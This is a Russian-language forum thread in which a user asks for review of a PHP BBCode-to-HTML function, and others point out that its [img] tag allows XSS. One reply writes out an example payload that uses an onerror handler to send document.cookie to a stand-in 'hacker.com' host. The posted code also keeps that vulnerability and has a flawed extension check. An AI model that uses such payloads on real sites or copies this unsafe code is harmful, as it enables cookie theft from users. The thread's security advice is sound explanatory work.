Оцените/дополните "систему" BB кодов

[Кольша]

Всем привет!!!!Написал тут для сайт систему так называемых BB кодов прошу оценить дополнить вот код:

PHP код:

function bbtohtml($bb) 
{
    $tr = array(
        "\n"=>"<br>",
        "<"=>"&lt;",">"=>"&gt;",
        "&"=>"&amp;",
        "[Delphi]"=>'<pre class="brush: delphi;">',"[/Delphi]"=>"</pre>",
        "[ Php ]"=>'<pre class="brush: php;">',"[/ Php ]"=>"</pre>",
        "[Css]"=>'<pre class="brush: css;">',"[/Css]"=>"</pre>",
        "[JS]"=>'<pre class="brush: js;">',"[/JS]"=>"</pre>",
        "[Sql]"=>'<pre class="brush: sql;">',"[/Sql]"=>"</pre>",
        "[B]"=>"<b>","[/B]"=>"</b>",
        "[I]"=>"<i>","[/I]"=>"</i>",
        "[U]"=>"<u>","[/U]"=>"</u>",
        "[IMG]"=>'<img  src="',"[/IMG]"=>'" alt="">',
////smiles
        "[Amazing]"=>'<img  src="/files/smiles/amazing.png">',
        "[Anger]"=>'<img  src="/files/smiles/anger.png">',
        "[Badegg]"=>'<img  src="/files/smiles/badegg.png">',
        "[Badsmile]"=>'<img  src="/files/smiles/badsmile.png">',
        "[Beaten]"=>'<img  src="/files/smiles/beaten.png">',
        "[Bigsmile]"=>'<img  src="/files/smiles/bigsmile.png">',
        "[Cry]"=>'<img  src="/files/smiles/cry.png">',
        "[Electricshock]"=>'<img  src="/files/smiles/electricshock.png">',
        "[Exciting]"=>'<img  src="/files/smiles/exciting.png">',
        "[Eyesdroped]"=>'<img  src="/files/smiles/eyesdroped.png">',
        "[Greedy]"=>'<img  src="/files/smiles/greedy.png">',
        "[Grimace]"=>'<img  src="/files/smiles/grimace.png">',
        "[Haha]"=>'<img  src="/files/smiles/haha.png">',
        "[Happy]"=>'<img  src="/files/smiles/happy.png">',
        "[Horror]"=>'<img  src="/files/smiles/horror.png">',
        "[Money]"=>'<img  src="/files/smiles/money.png">',
        "[Scorn]"=>'<img  src="/files/smiles/"scorn.png>',
        "[Secretsmile]"=>'<img  src="/files/smiles/secretsmile.png">',
        "[Shocked]"=>'<img  src="/files/smiles/shocked.png">',
        "[Theironman]"=>'<img  src="/files/smiles/theironman.png">',
        "[Unhappy]"=>'<img  src="/files/smiles/unhappy.png">',
        "[What]"=>'<img  src="/files/smiles/what.png">'
///smiles
     );
    return strtr($bb,$tr);
} 


Прошу протестить!!

[ADSoft]

оно нам надо? Сами не пробовали тестировать?

[Wicort]

тег img закрывать не забывайте

Код HTML:

<img ... />

[Cronos20]

Никакой защиты от xss в теге <img/>, рискуете получить кучу сюрпризов

[Кольша]

опишите как защититься??

[Cronos20]

Регулярным выражением проверять, чтобы src всегда был валидной картинкой, т.е. файлом с расширением .jpg, .png
Чтобы вместо файла не подсунули что-то типа http://hacker.com/image.php?cookie=document.cookie в разных вариациях

[Кольша]

Спасибо,я уж почитал в википедии,правильно ли я мышлю:
1)копируем текст с позиции src" по позицию " ;
2)копирем текст до первой точки с конца или последние три буквы
проверям If ($ext!='jpg' || $ext!='bmp' || $ext!='png' || $ext!='gif'){}

[Cronos20]

Я ж вам говорю, регулярное выражение нормальное надо
Вот инфа к размышлению :

Код:

[img]unknown.png" onerror="img=new Image(); img.src = 'http://hacker.com/image.php?cookie=' + document.cookie + '&fake=fake.gif[/img]

И ваш фильтр пал)))

[pompiduskus]

Привет ! Я думаю тут не тяжело будет , адрес всегда стандартный . <img src="/files/smiles/what.png"> .. меняется только последнее слово .
Как сказал Cronos20 хорошая регулярка и ни кто не проскочит )))

Cronos20 Спасибо за дельный совет .